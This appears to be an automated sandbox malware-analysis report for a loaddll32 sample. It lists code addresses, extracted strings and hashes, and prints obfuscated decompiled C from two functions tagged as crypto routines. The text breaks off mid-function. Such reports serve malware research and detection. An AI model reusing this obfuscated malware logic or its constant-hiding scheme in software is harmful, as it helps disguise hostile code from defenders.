0x00877e3b
0x00877e43
0x00877e50
0x00877e54
0x00877e5c
0x00877e64
0x00877e6c
0x00877e74
0x00877e7c
0x00877e84
0x00877e8c
0x00877e94
0x00877e99
0x00877ea1
0x00877ea9
0x00877eb4
0x00877ebf
0x00877eca
0x00877ed5
0x00877ee0
0x00877eeb
0x00877ef3
0x00877efb
0x00877f00
0x00877f08
0x00877f13
0x00877f1e
0x00877f29
0x00877f31
0x00877f36
0x00877f44
0x00877f48
0x00877f50
0x00877f5b
0x00877f63
0x00877f6e
0x00877f76
0x00877f83
0x00877f87
0x00877f8f
0x00877f99
0x00877fa4
0x00877faf
0x00877fba
0x00877fc5
0x00877fd0
0x00877fdb
0x00877fe6
0x00877fef
0x00877ff4
0x00877ffd
0x00878008
0x00878010
0x00878015
0x0087801a
0x00878022
0x0087802d
0x00878038
0x00878043
0x0087804f
0x00878054
0x0087805a
0x0087805f
0x00878067
0x0087806f
0x00878074
0x0087807c
0x00878084
0x0087808c
0x00878094
0x00878098
0x008780a0
0x008780ab
0x008780b6
0x008780c1
0x008780c9
0x008780d5
0x008780da
0x008780e0
0x008780e8
0x008780f0
0x008780fd
0x008780fe
0x00878102
0x0087810a
0x00878115
0x00878120
0x0087812b
0x00878136
0x00878141
0x0087814c
0x00878154
0x0087815c
0x00878161
0x00878169
0x00878171
0x0087817c
0x00878187
0x00878192
0x0087819a
0x008781a7
0x008781b1
0x008781b5
0x008781bd
0x008781c7
0x008781d4
0x008781e1
0x008781e9
0x008781f1
0x008781fd
0x008781fe
0x00878202
0x0087820a
0x00878212
0x0087821a
0x0087821f
0x00878227
0x0087822f
0x00878237
0x0087823c
0x00878244
0x0087824c
0x00878254
0x0087825c
0x00878264
0x0087826c
0x00878277
0x0087827f
0x0087828a
0x00878292
0x0087829a
0x008782a2
0x008782aa
0x008782b5
0x008782c0
0x008782cb
0x008782d6
0x008782e1
0x008782ec
0x008782f7
0x008782ff
0x0087830a
0x00878312
0x00878317
0x0087831f
0x00878327
0x0087832f
0x00878337
0x0087833c
0x00878344
0x00878357
0x0087835e
0x00878369
0x00878371
0x00878379
0x0087837e
0x00878386
0x00878393
0x00878397
0x0087839f
0x008783a4
0x008783ac
0x008783b8
0x008783ba
0x008783be
0x008783c6
0x008783ce
0x008783d6
0x008783e4
0x00878546
0x0087854b
0x00878554
0x00878558
0x008785a1
0x008785c1
0x008785d0
0x00000000
0x008785f1
0x008783ea
0x008783ec
0x0087850a
0x0087850a
0x00878510
0x00000000
0x00000000
0x00000000
0x00000000
0x008785fe
0x008785fe
0x008785fe
0x00878409
0x0087842e
0x00878452
0x00878457
0x00878463
0x00878467
0x008784b6
0x008784d6
0x008784e2
0x008784f1
0x008784f6
0x008784fb
0x00878501
0x00000000
0x00878501
0x00000000
0x008784fb
0x00878508
0x00000000

Strings

jz, xrefs: 00877FE6
}0, xrefs: 00877FAF
o, xrefs: 00877F00
\f%0, xrefs: 00877DD1
^xZ, xrefs: 0087817C
Gqx, xrefs: 00877E64
)p?M, xrefs: 00878317
$P, xrefs: 00877D8E
O"r, xrefs: 00878067
>}#, xrefs: 00878369

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$)p?M$>}#$Gqx$O"r$\f%0$^xZ$jz$o$}0
API String ID: 0-1313373530
Opcode ID: 5158a749ce862b261bb8a9bf5d95cb44763694b816f2f603f0d250cd8b5d21ae
Instruction ID: de97caae0e68288a3e7410b71ca0df5df31aba74f17e3891f113575792515d4f
Opcode Fuzzy Hash: 5158a749ce862b261bb8a9bf5d95cb44763694b816f2f603f0d250cd8b5d21ae
Instruction Fuzzy Hash: CD12F271509380DFD3A8CF65C94AA9BBBE1FBC4708F108A1DE1D996260D7B58909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 0086238C, Relevance: 11.7, Strings: 9, Instructions: 428
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0086238C(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1576;
				char _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				void* _t472;
				void* _t474;
				void* _t477;
				void* _t481;
				void* _t496;
				signed int _t498;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				signed int _t502;
				void* _t503;
				signed int _t507;
				signed int _t537;
				signed int _t548;
				void* _t550;
				void* _t555;

				_v1584 = _v1584 & 0x00000000;
				_v1788 = 0x33fdc0;
				_v1788 = _v1788 >> 6;
				_v1788 = _v1788 + 0xffff8381;
				_v1788 = _v1788 | 0x21bcf8d5;
				_v1788 = _v1788 ^ 0x23bcfbfd;
				_v1744 = 0xdaa9b2;
				_v1744 = _v1744 >> 0xa;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 * 0xc;
				_t496 = __ecx;
				_v1744 = _v1744 ^ 0x00028d02;
				_t550 = 0x854d193;
				_v1632 = 0x7e6112;
				_v1632 = _v1632 << 4;
				_v1632 = _v1632 ^ 0x07e103ba;
				_v1716 = 0xd48fca;
				_v1716 = _v1716 + 0x54b9;
				_v1716 = _v1716 >> 3;
				_v1716 = _v1716 ^ 0x00172ea2;
				_v1612 = 0xc953de;
				_v1612 = _v1612 + 0xffff7488;
				_v1612 = _v1612 ^ 0x00c8e870;
				_v1660 = 0xfcf42a;
				_v1660 = _v1660 ^ 0x4c4ed76c;
				_v1660 = _v1660 ^ 0x4cb955ce;
				_v1600 = 0xa6934b;
				_v1600 = _v1600 >> 7;
				_v1600 = _v1600 ^ 0x00032972;
				_v1604 = 0xac816b;
				_t498 = 0x70;
				_v1604 = _v1604 * 0x21;
				_v1604 = _v1604 ^ 0x16380272;
				_v1696 = 0x6f97e6;
				_v1696 = _v1696 | 0xa083c342;
				_v1696 = _v1696 ^ 0x07d73a4d;
				_v1696 = _v1696 ^ 0xa73f6dc5;
				_v1684 = 0xc2049d;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 ^ 0x7749f8a8;
				_v1684 = _v1684 ^ 0x6f051565;
				_v1652 = 0xcc0992;
				_v1652 = _v1652 / _t498;
				_v1652 = _v1652 ^ 0x000062be;
				_v1644 = 0xb03f6e;
				_v1644 = _v1644 | 0x923ba096;
				_v1644 = _v1644 ^ 0x92bf0244;
				_v1596 = 0xe574f1;
				_t499 = 0x34;
				_v1596 = _v1596 * 0x7b;
				_v1596 = _v1596 ^ 0x6e3d68f9;
				_v1712 = 0x56ecc;
				_v1712 = _v1712 | 0x82f65ce8;
				_v1712 = _v1712 ^ 0x3fbbcfe7;
				_v1712 = _v1712 ^ 0xbd43ec0e;
				_v1672 = 0x17149a;
				_v1672 = _v1672 >> 3;
				_v1672 = _v1672 ^ 0x000903bb;
				_v1780 = 0xd02801;
				_v1780 = _v1780 + 0x92b0;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 >> 2;
				_v1780 = _v1780 ^ 0x000a2638;
				_v1680 = 0x58b587;
				_v1680 = _v1680 / _t499;
				_t500 = 0x6c;
				_v1680 = _v1680 / _t500;
				_v1680 = _v1680 ^ 0x000e92c3;
				_v1756 = 0xa3a224;
				_v1756 = _v1756 + 0xffffb0d0;
				_v1756 = _v1756 | 0x22aa770c;
				_v1756 = _v1756 ^ 0xa1e09b61;
				_v1756 = _v1756 ^ 0x83433f26;
				_v1772 = 0x502a69;
				_v1772 = _v1772 + 0xf56b;
				_v1772 = _v1772 ^ 0x45c826e2;
				_v1772 = _v1772 << 3;
				_v1772 = _v1772 ^ 0x2cc29674;
				_v1704 = 0x78c4c8;
				_v1704 = _v1704 >> 5;
				_v1704 = _v1704 >> 0xb;
				_v1704 = _v1704 ^ 0x000284d1;
				_v1636 = 0x5a1a48;
				_v1636 = _v1636 | 0x49fffb3e;
				_v1636 = _v1636 ^ 0x49fe8be8;
				_v1740 = 0xbf037f;
				_v1740 = _v1740 << 0xe;
				_t501 = 0x25;
				_v1740 = _v1740 / _t501;
				_v1740 = _v1740 | 0xccccb3e4;
				_v1740 = _v1740 ^ 0xcdfabced;
				_v1688 = 0x95b1ca;
				_v1688 = _v1688 ^ 0x177e4a6b;
				_v1688 = _v1688 | 0x2f1db7c3;
				_v1688 = _v1688 ^ 0x3ffaee54;
				_v1592 = 0x55c9d;
				_v1592 = _v1592 + 0x6a7d;
				_v1592 = _v1592 ^ 0x0009fe3c;
				_v1628 = 0x3a227c;
				_v1628 = _v1628 + 0x86b1;
				_v1628 = _v1628 ^ 0x003b89cb;
				_v1588 = 0x8f964;
				_v1588 = _v1588 ^ 0xa28705c5;
				_v1588 = _v1588 ^ 0xa2875abd;
				_v1748 = 0xfacc7e;
				_v1748 = _v1748 >> 7;
				_v1748 = _v1748 << 5;
				_v1748 = _v1748 * 0x52;
				_v1748 = _v1748 ^ 0x141cbb89;
				_v1668 = 0x1ea707;
				_v1668 = _v1668 >> 9;
				_v1668 = _v1668 ^ 0x0009aede;
				_v1620 = 0x6a93f9;
				_v1620 = _v1620 * 0x2f;
				_v1620 = _v1620 ^ 0x139d0c16;
				_v1732 = 0xe0254d;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 + 0x8d90;
				_v1732 = _v1732 ^ 0x6e303e8a;
				_v1732 = _v1732 ^ 0x6e36b510;
				_v1764 = 0x8f9e28;
				_v1764 = _v1764 | 0x05ab8c08;
				_v1764 = _v1764 ^ 0x1f734d6b;
				_v1764 = _v1764 | 0x4c44fbff;
				_v1764 = _v1764 ^ 0x5ed9dcbf;
				_v1664 = 0x89ae50;
				_v1664 = _v1664 + 0xffff7042;
				_v1664 = _v1664 ^ 0x008bcf93;
				_v1720 = 0x59414f;
				_v1720 = _v1720 ^ 0xb8de2fa2;
				_v1720 = _v1720 << 3;
				_v1720 = _v1720 ^ 0xc43925a0;
				_v1776 = 0x701ae5;
				_v1776 = _v1776 * 0x2f;
				_v1776 = _v1776 + 0xffff7ac3;
				_v1776 = _v1776 >> 0xd;
				_v1776 = _v1776 ^ 0x000eab5b;
				_v1784 = 0xc6ba99;
				_v1784 = _v1784 + 0xffff3dc8;
				_v1784 = _v1784 + 0xfffff02f;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0x17a755e4;
				_v1648 = 0x49cca0;
				_v1648 = _v1648 << 0xe;
				_v1648 = _v1648 ^ 0x7324fd9e;
				_v1656 = 0xf258c2;
				_v1656 = _v1656 >> 9;
				_v1656 = _v1656 ^ 0x0001b893;
				_v1792 = 0x2c7b35;
				_t265 =  &_v1792; // 0x2c7b35
				_t502 = 0x5b;
				_v1792 =  *_t265 * 0xd;
				_v1792 = _v1792 << 2;
				_v1792 = _v1792 + 0x1495;
				_v1792 = _v1792 ^ 0x090f1a77;
				_v1768 = 0xbf4508;
				_v1768 = _v1768 / _t502;
				_v1768 = _v1768 * 0x7b;
				_v1768 = _v1768 * 0x6c;
				_v1768 = _v1768 ^ 0x6d142a82;
				_v1640 = 0xd70bb;
				_v1640 = _v1640 + 0xffffb965;
				_v1640 = _v1640 ^ 0x000d3816;
				_v1752 = 0x745b9d;
				_v1752 = _v1752 >> 0xb;
				_v1752 = _v1752 + 0xde80;
				_v1752 = _v1752 + 0xffff3192;
				_v1752 = _v1752 ^ 0x0008925b;
				_v1760 = 0xacf8cd;
				_v1760 = _v1760 + 0xffff9672;
				_v1760 = _v1760 | 0xf153a794;
				_v1760 = _v1760 >> 8;
				_v1760 = _v1760 ^ 0x00f89a8f;
				_v1736 = 0x809c29;
				_v1736 = _v1736 + 0xffffec2c;
				_v1736 = _v1736 | 0xf5f6afdc;
				_v1736 = _v1736 ^ 0xe29e6862;
				_v1736 = _v1736 ^ 0x176fe90e;
				_v1692 = 0x187f09;
				_v1692 = _v1692 ^ 0xea03092e;
				_v1692 = _v1692 + 0x8629;
				_v1692 = _v1692 ^ 0xea1b0891;
				_v1616 = 0xdadf05;
				_v1616 = _v1616 >> 3;
				_v1616 = _v1616 ^ 0x001b90e7;
				_v1700 = 0x255f4a;
				_v1700 = _v1700 + 0x19d8;
				_v1700 = _v1700 * 0x77;
				_v1700 = _v1700 ^ 0x1164c06a;
				_v1728 = 0x19a192;
				_v1728 = _v1728 | 0x5ed50fa2;
				_v1728 = _v1728 + 0xffff411c;
				_v1728 = _v1728 | 0x02c614be;
				_v1728 = _v1728 ^ 0x5edf5bbc;
				_v1608 = 0x401b2;
				_v1608 = _v1608 | 0xbe85eb48;
				_v1608 = _v1608 ^ 0xbe8cf33f;
				_v1676 = 0x1ae3ab;
				_v1676 = _v1676 | 0xf7e0dbb3;
				_v1676 = _v1676 >> 4;
				_v1676 = _v1676 ^ 0x0f7cac70;
				_v1724 = 0xfdfaa3;
				_v1724 = _v1724 + 0xbcd0;
				_v1724 = _v1724 | 0x4b62528b;
				_v1724 = _v1724 ^ 0x4bf9131d;
				_v1708 = 0x8383c7;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 + 0xffff26cd;
				_v1708 = _v1708 ^ 0x002bd4f5;
				_v1624 = 0xf208a5;
				_v1624 = _v1624 << 8;
				_v1624 = _v1624 ^ 0xf20fbad4;
				_t548 = _v1584;
				while(1) {
					L1:
					_t503 = 0x5394512;
					L2:
					while(_t550 != 0x36274) {
						if(_t550 == 0x34d5b0c) {
							_push(_t503);
							_t477 = E008785FF(_v1736, _v1692, __eflags,  &_v1580, 0,  &_v1564, _v1616, 0, _v1700);
							__eflags = _t477;
							if(_t477 == 0) {
								L26:
								return _t477;
							}
							E00881538(_v1728, _v1608, _v1580);
							_t537 = _v1724;
							_push(_v1576);
							_t507 = _v1676;
							L25:
							return E00881538(_t507, _t537);
						}
						if(_t550 == 0x37ad1c9) {
							_t537 = _v1624;
							_push(_v1584);
							_t507 = _v1708;
							goto L25;
						}
						if(_t550 == _t503) {
							_push(_v1792);
							_t481 = E0087017B( &_v1564, _v1776, _t503, _v1784, _v1648, _v1584,  &_v1580, _v1656);
							_t555 = _t555 + 0x20;
							__eflags = _t481;
							if(__eflags != 0) {
								E00881538(_v1768, _v1640, _v1580);
								E00881538(_v1752, _v1760, _v1576);
							}
							L14:
							_t550 = 0x37ad1c9;
							while(1) {
								L1:
								_t503 = 0x5394512;
								goto L2;
							}
						}
						if(_t550 == 0x854d193) {
							_t550 = 0x36274;
							continue;
						}
						if(_t550 == 0x9c7608b) {
							E00880DB1(_v1696,  &_v1044, __eflags, _v1684, _t503, _v1652);
							 *((short*)(E008709DD(_v1644,  &_v1044, _v1596, _v1712))) = 0;
							E0086BAA9(_v1672, _v1780, __eflags, _v1680, _v1756,  &_v524);
							_push(_v1740);
							_push(_v1636);
							_push(_v1704);
							E00882D0A(_v1592, __eflags,  &_v524, _v1628, _v1588, _v1748, 0x8618bc,  &_v1564,  &_v1044, E0087E1F8(0x8618bc, _v1772, __eflags));
							E0087FECB(_t488, _v1668, _v1620, _v1732, _v1764);
							_t555 = _t555 + 0x58;
							__eflags = E0086BFBE( &_v1564, _t496, _v1720);
							if(__eflags != 0) {
								_t474 = 0x2f41e48;
								__eflags = _t548 - 0x2f41e48;
								_t503 = 0x5394512;
								_t550 =  ==  ? 0x5394512 : 0x34d5b0c;
								continue;
							}
							goto L14;
						}
						if(_t550 != 0xf62a168) {
							L20:
							__eflags = _t550 - 0x4f1a594;
							if(__eflags != 0) {
								continue;
							}
							return _t474;
						}
						if(_t548 != _t474) {
							_t550 = 0x9c7608b;
							continue;
						}
						_push(_v1788);
						_push( &_v1584);
						_t477 = E00879774(_v1612, _v1660, _v1600, _t503, _v1604, _t503);
						_t555 = _t555 + 0x18;
						if(_t477 == 0) {
							goto L26;
						}
						_t550 = 0x9c7608b;
						goto L1;
					}
					_t472 = E0087C387(_t503);
					__eflags = _t472 - E0087BC6B();
					_t474 = 0x2f41e48;
					_t550 = 0xf62a168;
					_t548 =  !=  ? 0x2f41e48 : 0x95df4e1;
					_t503 = 0x5394512;
					goto L20;
				}
			}

0x00862392
0x0086239c
0x008623a4
0x008623a9
0x008623b1
0x008623b9
0x008623c1
0x008623c9
0x008623ce
0x008623dc
0x008623e0
0x008623e2
0x008623ea
0x008623ef
0x008623fa
0x00862402
0x0086240d
0x00862415
0x0086241d
0x00862422
0x0086242a
0x00862435
0x00862440
0x0086244b
0x00862456
0x00862461
0x0086246c
0x00862477
0x0086247f
0x0086248a
0x0086249f
0x008624a2
0x008624a9
0x008624b4
0x008624bc
0x008624c4
0x008624cc
0x008624d4
0x008624df
0x008624e7
0x008624f2
0x008624fd
0x00862513
0x0086251a
0x00862525
0x00862530
0x0086253b
0x00862546
0x00862559
0x0086255a
0x00862561
0x0086256c
0x00862574
0x0086257c
0x00862584
0x0086258c
0x00862597
0x0086259f
0x008625aa
0x008625b2
0x008625ba
0x008625bf
0x008625c4
0x008625cc
0x008625e0
0x008625f2
0x008625f7
0x00862600
0x0086260b
0x00862613
0x0086261b
0x00862623
0x0086262b
0x00862633
0x0086263b
0x00862643
0x0086264b
0x00862650
0x00862658
0x00862660
0x00862665
0x0086266a
0x00862672
0x0086267d
0x00862688
0x00862693
0x0086269b
0x008626a4
0x008626a7
0x008626ab
0x008626b3
0x008626bb
0x008626c3
0x008626cb
0x008626d3
0x008626db
0x008626e6
0x008626f1
0x008626fc
0x00862707
0x00862712
0x0086271d
0x00862728
0x00862733
0x0086273e
0x00862746
0x0086274b
0x00862755
0x00862759
0x00862761
0x0086276c
0x00862774
0x0086277f
0x00862792
0x00862799
0x008627a4
0x008627ac
0x008627b1
0x008627b9
0x008627c1
0x008627c9
0x008627d1
0x008627d9
0x008627e1
0x008627e9
0x008627f1
0x008627fc
0x00862807
0x00862812
0x0086281a
0x00862822
0x00862827
0x0086282f
0x0086283c
0x00862840
0x00862848
0x0086284d
0x00862857
0x0086285f
0x00862867
0x0086286f
0x00862874
0x0086287c
0x00862887
0x0086288f
0x0086289a
0x008628a5
0x008628ad
0x008628b8
0x008628c0
0x008628c7
0x008628c8
0x008628cc
0x008628d1
0x008628d9
0x008628e1
0x008628ef
0x008628f8
0x00862901
0x00862905
0x0086290d
0x00862918
0x00862923
0x0086292e
0x00862936
0x0086293b
0x00862943
0x0086294b
0x00862953
0x0086295b
0x00862963
0x0086296b
0x00862970
0x00862978
0x00862980
0x00862988
0x00862990
0x00862998
0x008629a0
0x008629a8
0x008629b0
0x008629b8
0x008629c0
0x008629cb
0x008629d3
0x008629de
0x008629e6
0x008629f3
0x008629f7
0x008629ff
0x00862a07
0x00862a0f
0x00862a17
0x00862a1f
0x00862a27
0x00862a32
0x00862a3d
0x00862a48
0x00862a53
0x00862a5e
0x00862a66
0x00862a71
0x00862a79
0x00862a81
0x00862a89
0x00862a91
0x00862a99
0x00862a9e
0x00862aa6
0x00862aae
0x00862ab9
0x00862ac6
0x00862ad1
0x00862ad8
0x00862ad8
0x00862add
0x00000000
0x00862ae2
0x00862af4
0x00862d78
0x00862da3
0x00862dab
0x00862dad
0x00862de9
0x00862de9
0x00862de9
0x00862dc1
0x00862dc6
0x00862dcb
0x00862dd2
0x00862dd9
0x00000000
0x00862dde
0x00862afc
0x00862d64
0x00862d6b
0x00862d72
0x00000000
0x00862d72
0x00862b04
0x00862cb3
0x00862ce4
0x00862ce9
0x00862cec
0x00862cee
0x00862d02
0x00862d17
0x00862d1c
0x00862c89
0x00862c89
0x00862ad8
0x00862ad8
0x00862add
0x00000000
0x00862add
0x00862ad8
0x00862b10
0x00862ca9
0x00000000
0x00862ca9
0x00862b1c
0x00862b99
0x00862bc1
0x00862be2
0x00862bef
0x00862bf3
0x00862bfa
0x00862c46
0x00862c63
0x00862c68
0x00862c85
0x00862c87
0x00862c90
0x00862c9a
0x00862c9c
0x00862ca1
0x00000000
0x00862ca1
0x00000000
0x00862c87
0x00862b24
0x00862d56
0x00862d56
0x00862d5c
0x00000000
0x00000000
0x00000000
0x00862d5c
0x00862b2c
0x00862b72
0x00000000
0x00862b72
0x00862b2e
0x00862b39
0x00862b58
0x00862b5d
0x00862b62
0x00000000
0x00000000
0x00862b68
0x00000000
0x00862b68
0x00862d31
0x00862d3d
0x00862d44
0x00862d49
0x00862d4e
0x00862d51
0x00000000
0x00862d51

Strings

5{,, xrefs: 008628C0
}j, xrefs: 008626E6
i*P, xrefs: 00862633
OAY, xrefs: 00862812
J_%, xrefs: 008629DE
|":, xrefs: 008626FC
$P, xrefs: 008623DA
8&, xrefs: 008625C4
M%, xrefs: 008627A4

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: $P$5{,$8&$J_%$M%$OAY$i*P$|":$}j
API String ID: 0-2024644708
Opcode ID: 8f26f0357830fb683fe8693dc65ed32bdef33c0ae3a992afef03c89f885fea77
Instruction ID: 44175953d2d81cce8123ebcdc1f46892689dcb7ce3d40d9c731463f4cb81732b
Opcode Fuzzy Hash: 8f26f0357830fb683fe8693dc65ed32bdef33c0ae3a992afef03c89f885fea77
Instruction Fuzzy Hash: CD321E714097819FD778CF65C58AA8BBBE1FBC4308F50891DE2DA96220DBB18949CF13

Uniqueness

Uniqueness Score: -1.00%

Function 0087B257, Relevance: 11.7, Strings: 9, Instructions: 425
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0087B257(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr _t442;
				void* _t450;
				signed int _t452;
				intOrPtr _t464;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				intOrPtr _t476;
				void* _t511;
				intOrPtr* _t519;
				signed int _t522;
				signed int* _t528;
				void* _t531;

				_push(_a8);
				_push(_a4);
				_v16 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0087FE29(__ecx);
				_v104 = 0xdca0c2;
				_t528 =  &(( &_v196)[4]);
				_v104 = _v104 ^ 0x20eddded;
				_v104 = _v104 + 0xc1e4;
				_t464 = 0;
				_v104 = _v104 ^ 0x20323f12;
				_t526 = 0;
				_v100 = 0xb7a414;
				_t522 = 0x63dbfd2;
				_v100 = _v100 >> 0xd;
				_v100 = _v100 >> 6;
				_v100 = _v100 ^ 0x00000017;
				_v56 = 0x45a952;
				_t466 = 0x59;
				_v56 = _v56 * 0x5b;
				_v56 = _v56 ^ 0x18c33027;
				_v188 = 0x2a9354;
				_v188 = _v188 * 0x52;
				_v188 = _v188 + 0xffff09d3;
				_v188 = _v188 ^ 0x657f446d;
				_v188 = _v188 ^ 0x68d207a2;
				_v156 = 0xab48ef;
				_v156 = _v156 >> 9;
				_v156 = _v156 ^ 0x16e9b314;
				_v156 = _v156 + 0xffff4dee;
				_v156 = _v156 ^ 0x16e86217;
				_v76 = 0xa04b9d;
				_v76 = _v76 / _t466;
				_v76 = _v76 + 0xffff95c9;
				_v76 = _v76 ^ 0x000bb2f5;
				_v96 = 0x5e9ce7;
				_v96 = _v96 >> 0xb;
				_v96 = _v96 + 0x393b;
				_v96 = _v96 ^ 0x0008104f;
				_v168 = 0x9b8ea1;
				_v168 = _v168 >> 3;
				_v168 = _v168 ^ 0x41b76bd4;
				_t467 = 0x4a;
				_v168 = _v168 / _t467;
				_v168 = _v168 ^ 0x00e0763a;
				_v84 = 0x6b9fd8;
				_v84 = _v84 + 0xffff492d;
				_v84 = _v84 ^ 0xc4f61535;
				_v84 = _v84 ^ 0xc49355d0;
				_v92 = 0xe62d26;
				_v92 = _v92 + 0xffffd3ae;
				_v92 = _v92 + 0xba25;
				_v92 = _v92 ^ 0x00e8488b;
				_v176 = 0x224b80;
				_v176 = _v176 * 0x64;
				_v176 = _v176 + 0xbfa2;
				_v176 = _v176 ^ 0x4d1eb270;
				_v176 = _v176 ^ 0x4076c61f;
				_v24 = 0x19cf70;
				_v24 = _v24 ^ 0x9000781e;
				_v24 = _v24 ^ 0x90166967;
				_v88 = 0x46d2d8;
				_v88 = _v88 << 0xd;
				_v88 = _v88 + 0x562b;
				_v88 = _v88 ^ 0xda50dff0;
				_v112 = 0x785cae;
				_v112 = _v112 ^ 0x168a73c4;
				_v112 = _v112 | 0x1d89c9b4;
				_v112 = _v112 ^ 0x1ff91637;
				_v196 = 0xff4614;
				_t468 = 0x5f;
				_v196 = _v196 / _t468;
				_v196 = _v196 + 0x757b;
				_t469 = 0x16;
				_v196 = _v196 * 0x60;
				_v196 = _v196 ^ 0x012524f0;
				_v80 = 0xc3120d;
				_v80 = _v80 | 0x1e4982bc;
				_v80 = _v80 * 0x7e;
				_v80 = _v80 ^ 0x2837c3c2;
				_v120 = 0xd97d0d;
				_v120 = _v120 << 0xd;
				_v120 = _v120 + 0x504;
				_v120 = _v120 ^ 0x2fa67262;
				_v172 = 0x34730a;
				_t142 =  &_v172; // 0x34730a
				_v172 =  *_t142 * 0x22;
				_t144 =  &_v172; // 0x34730a
				_v172 =  *_t144 / _t469;
				_v172 = _v172 << 8;
				_v172 = _v172 ^ 0x5108b0e0;
				_v68 = 0x5410d;
				_v68 = _v68 | 0x0af8be45;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0xafd73693;
				_v40 = 0x3314ee;
				_v40 = _v40 << 6;
				_v40 = _v40 ^ 0x0cc221f8;
				_v148 = 0xdcf092;
				_v148 = _v148 >> 2;
				_t470 = 0x7d;
				_v148 = _v148 * 7;
				_v148 = _v148 ^ 0xc025e338;
				_v148 = _v148 ^ 0xc1a4d56b;
				_v48 = 0x99791e;
				_v48 = _v48 + 0xd07a;
				_v48 = _v48 ^ 0x009468bf;
				_v20 = 0xfa3426;
				_v20 = _v20 * 0x2f;
				_v20 = _v20 ^ 0x2dec6acf;
				_v128 = 0x599df;
				_v128 = _v128 / _t470;
				_v128 = _v128 ^ 0x7679aa05;
				_v128 = _v128 ^ 0x7675df44;
				_v124 = 0xbc7529;
				_t471 = 0x70;
				_v124 = _v124 / _t471;
				_v124 = _v124 * 5;
				_v124 = _v124 ^ 0x00024b90;
				_v140 = 0x23c06e;
				_v140 = _v140 << 8;
				_v140 = _v140 + 0xffff4990;
				_v140 = _v140 ^ 0x23b90b70;
				_v32 = 0x48411;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x000cf15b;
				_v28 = 0x8f257d;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 ^ 0x00045aca;
				_v72 = 0xc5b926;
				_t472 = 0x25;
				_v72 = _v72 * 0xd;
				_v72 = _v72 + 0x5de2;
				_v72 = _v72 ^ 0x0a0d42ec;
				_v52 = 0xb82feb;
				_v52 = _v52 / _t472;
				_v52 = _v52 ^ 0x000a7562;
				_v192 = 0x93d477;
				_v192 = _v192 + 0x2145;
				_v192 = _v192 >> 9;
				_t473 = 0x79;
				_v192 = _v192 / _t473;
				_v192 = _v192 ^ 0x000494fa;
				_v60 = 0xdd5e00;
				_v60 = _v60 + 0xe8be;
				_v60 = _v60 ^ 0x00d904e2;
				_v116 = 0xf92f20;
				_v116 = _v116 << 2;
				_v116 = _v116 + 0xffff4fca;
				_v116 = _v116 ^ 0x03e480d1;
				_v108 = 0xc8e556;
				_v108 = _v108 << 0xe;
				_v108 = _v108 | 0x9333dae4;
				_v108 = _v108 ^ 0xbb75d6e6;
				_v184 = 0xf22b18;
